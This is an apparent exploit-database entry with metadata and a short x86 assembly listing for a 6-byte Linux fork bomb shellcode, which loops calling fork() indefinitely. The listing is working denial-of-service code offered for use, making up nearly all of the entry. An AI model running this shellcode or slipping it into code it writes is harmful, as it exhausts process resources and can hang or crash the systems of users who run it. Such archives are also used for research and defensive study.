[] NeoSense

Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)

Author: root@thegibson
type: 
platform: linux_x86
port: 6.0
date_added: 2009-12-29 
date_updated: 2017-08-24 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

Smallest fork bomb shellcode I could make.


; linux/x86 fork bomb 6 bytes
; root@thegibson
; 2009-12-30

section .text
	global _start

_start:
	; fork()
	mov al, 2
	int 0x80
	jmp short _start